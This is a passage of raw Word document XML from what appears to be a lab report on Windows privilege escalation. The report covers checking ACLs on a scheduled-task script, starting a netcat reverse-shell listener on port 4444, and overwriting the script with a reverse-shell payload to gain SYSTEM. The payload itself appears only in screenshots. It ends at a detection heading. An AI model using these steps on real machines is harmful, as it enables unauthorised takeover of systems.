          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> before we try to attack it. In simple terms, we are looking for a "door" that was left unlocked.</w:t>
        <w:br/>
        <w:br/>
        <w:t>I used the command:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ls C:\TaskScripts\cleanup.ps1 | Get-Acl | Select-Object -ExpandProperty Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:br/>
        <w:t>This command is like checking the security guest list for a specific file. It points to the script (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>), asks the computer for its list of "who is allowed to do what" (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Get-Acl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>), and then pulls out the detailed names and rules (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Select-Object -ExpandProperty Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="7F2C5844" w:rsidP="7F2C5844" w:rsidRDefault="7F2C5844" w14:paraId="6BBA8665" w14:textId="4781EE7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00650AF2" w:rsidP="00620DCD" w:rsidRDefault="00620DCD" w14:paraId="2E05F20B" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A2DC34D" wp14:editId="626E7ADE">
            <wp:extent cx="5809201" cy="380559"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="454551900" name="Picture 3"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32181" name="Picture 3" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId43"/>
                    <a:srcRect b="91389"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5948320" cy="389673"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00650AF2" w:rsidP="00620DCD" w:rsidRDefault="00650AF2" w14:paraId="2EB8F841" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="7F2C5844" w:rsidP="00620DCD" w:rsidRDefault="00DB43DC" w14:paraId="6F7DE614" w14:textId="06E22DDB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B8DEA5D" wp14:editId="473937A0">
            <wp:extent cx="2367023" cy="2853690"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="533132181" name="Picture 3"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32181" name="Picture 3" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId43"/>
                    <a:srcRect t="7695" r="41752"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2369479" cy="2856651"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00650AF2" w:rsidP="00620DCD" w:rsidRDefault="00650AF2" w14:paraId="7E5C5501" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00360F16" w:rsidP="00360F16" w:rsidRDefault="00360F16" w14:paraId="4A0396AE" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00360F16" w:rsidP="00360F16" w:rsidRDefault="00360F16" w14:paraId="109FA20D" w14:textId="11418B33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>My screenshot proves the "Guest" group (Authenticated Users) has "Full Control" over the file, which means anyone can rewrite the script with a malicious payload to take over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00CF53B2" w:rsidP="00360F16" w:rsidRDefault="00CF53B2" w14:paraId="4882499A" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00D354AA" w:rsidP="00360F16" w:rsidRDefault="00D354AA" w14:paraId="24FE04EF" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00D354AA" w:rsidP="00514E33" w:rsidRDefault="00514E33" w14:paraId="40538C88" w14:textId="250600F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I used the command:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">on the Kali Linux machine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>to set up a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is just like keeping your phone line open and waiting for a specific call. We used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the specific "channel" so the Windows machine knows exactly where to find us. When the scheduled task runs our script, the victim computer "calls" our Kali IP address on this port, which gives us full control of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="0034312B" w:rsidP="0034312B" w:rsidRDefault="0034312B" w14:paraId="19E3AAEA" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="0034312B" w:rsidP="0034312B" w:rsidRDefault="0034312B" w14:paraId="3CCB8AB7" w14:textId="6399C2D0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CD38699" wp14:editId="0D6ECDE2">
            <wp:extent cx="3048000" cy="833377"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="674461117" name="Picture 4"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61117" name="Picture 4" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId44"/>
                    <a:srcRect b="44272"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="833377"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00CF53B2" w:rsidP="0034312B" w:rsidRDefault="00CF53B2" w14:paraId="52193CA0" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="0034312B" w:rsidP="0034312B" w:rsidRDefault="0034312B" w14:paraId="00468982" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="0034312B" w:rsidP="0034312B" w:rsidRDefault="00286895" w14:paraId="3CEE40AE" w14:textId="7BF15959">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>used the Out-File command, which overwrites the existing, safe script with our malicious "reverse shell" code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. We need this step to plant our trap in a location where the computer’s "Master" (SYSTEM) user will automatically run it for us. By storing our instructions in the $payload variable and forcing them into the file, we ensure that the next time the scheduled task triggers, it "calls" our Kali machine instead of performing its normal cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00D23E7D" w:rsidP="00D23E7D" w:rsidRDefault="00D23E7D" w14:paraId="50519CAF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00D23E7D" w:rsidP="0084134E" w:rsidRDefault="000F4FBF" w14:paraId="40B5442C" w14:textId="0806D727">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658241" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33D7AA6D" wp14:editId="3A6A5A96">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3755390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>23495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="166254"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="1786399038" name="Rectangle 7"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="914400" cy="166254"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFFF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1311EDF9">
              <v:rect id="Rectangle 7" style="position:absolute;margin-left:295.7pt;margin-top:1.85pt;width:1in;height:13.1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yellow" strokeweight="1pt" w14:anchorId="4126616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Iy+fagIAADcFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9v2jAQfp+0/8Hy+whBlG2ooUKtmCah thqd+mwcG6I5Pu9sCOyv39kJgXU8TcuDc/bdfffD3/n27lAbtlfoK7AFzwdDzpSVUFZ2U/DvL4sP nzjzQdhSGLCq4Efl+d3s/bvbxk3VCLZgSoWMQKyfNq7g2xDcNMu83Kpa+AE4ZUmpAWsRaIubrETR EHptstFwOMkawNIhSOU9nT60Sj5L+ForGZ609iowU3DKLaQV07qOaza7FdMNCretZJeG+IcsalFZ CtpDPYgg2A6rv6DqSiJ40GEgoc5A60qqVANVkw/fVLPaCqdSLdQc7/o2+f8HKx/3K/eM1IbG+akn MVZx0FjHP+XHDqlZx75Z6hCYpMPP+Xg8pJZKUuWTyehmHJuZnZ0d+vBFQc2iUHCku0gtEvulD63p ySTGsrCojEn3YWw88GCqMp6lDW7W9wbZXtBFLuij0C3GhRkFj67ZuZQkhaNREcPYb0qzqqTkRymT xDLVwwoplQ2TDjdZRzdNKfSO+TVHE/LOqbONbiqxr3ccXnP8M2LvkaKCDb1zXVnAawDljz5ya3+q vq05lr+G8viMDKHlvndyUdGFLIUPzwKJ7HSHNMDhiRZtoCk4dBJnW8Bf186jPXGQtJw1NDwF9z93 AhVn5qsldiZu0LSlzfjm44hi4KVmfamxu/oe6FpzeiqcTGK0D+YkaoT6leZ8HqOSSlhJsQsuA542 96EdanoppJrPkxlNmBNhaVdORvDY1Ui4l8OrQNexMhCdH+E0aGL6hpytbfS0MN8F0FVi7rmvXb9p OhP3u5ckjv/lPlmd37vZbwAAAP//AwBQSwMEFAAGAAgAAAAhAM4UQHLfAAAACAEAAA8AAABkcnMv ZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyo05Y2JMSpChLiVCQKHLi58TaJiNcmdtPk71lOcBzN aOZNsRltJwbsQ+tIwXyWgECqnGmpVvD+9nRzByJETUZ3jlDBhAE25eVFoXPjzvSKwz7Wgkso5FpB E6PPpQxVg1aHmfNI7B1db3Vk2dfS9PrM5baTiyRZS6tb4oVGe3xssPran6yC3UP60dhx58Nw/H75 9M/TeptOSl1fjdt7EBHH+BeGX3xGh5KZDu5EJohOwSqb33JUwTIFwX66XLE+KFhkGciykP8PlD8A AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250 ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAySMvn2oCAAA3BQAADgAAAAAAAAAAAAAAAAAu AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAzhRAct8AAAAIAQAADwAAAAAAAAAAAAAA AADEBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANAFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1546A016" wp14:editId="7D8ABF4F">
            <wp:extent cx="5829300" cy="993746"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="394141019" name="Picture 5" descr="A computer screen with white tex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90570" name="Picture 5" descr="A computer screen with white text  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="993746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00D23E7D" w:rsidP="00D23E7D" w:rsidRDefault="00D23E7D" w14:paraId="3D184E03" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="003E49BF" w:rsidR="00D23E7D" w:rsidP="00D23E7D" w:rsidRDefault="00B33CEF" w14:paraId="034EBDC4" w14:textId="6F18E556">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In the screenshot below, the Netcat session shows that the "phone call" we were waiting for has been answered. When the scheduled task ran our trapped script, it gave us a command prompt with the highest possible permissions. By typing whoami and seeing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nt authority\system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the result, we have official proof that we now have full control over the entire Windows machine. Hence proving a successful Privilege Escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B502DE" w:rsidP="00B502DE" w:rsidRDefault="00B502DE" w14:paraId="3ED1CDD2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C304E6" w:rsidP="0084134E" w:rsidRDefault="0084134E" w14:paraId="5E0D18B3" w14:textId="3454EFFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39870FBB" wp14:editId="24059E1D">
            <wp:extent cx="4933950" cy="1464197"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1472799914" name="Picture 6" descr="A computer screen with white tex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799914" name="Picture 6" descr="A computer screen with white text  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="30756"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4933950" cy="1464197"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B502DE" w:rsidP="0084134E" w:rsidRDefault="00B502DE" w14:paraId="494F00AA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00887727" w:rsidP="0084134E" w:rsidRDefault="00887727" w14:paraId="0054EF5D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00887727" w:rsidP="0084134E" w:rsidRDefault="00887727" w14:paraId="2F5B028D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="00ED5F9B" w:rsidRDefault="00500AD9" w14:paraId="3A8F60C5" w14:textId="361EE0B3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896689" w:id="30"/>
      <w:commentRangeStart w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:commentRangeEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="31"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E069F" w:rsidR="005E069F" w:rsidP="005E069F" w:rsidRDefault="005E069F" w14:paraId="692FA541" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
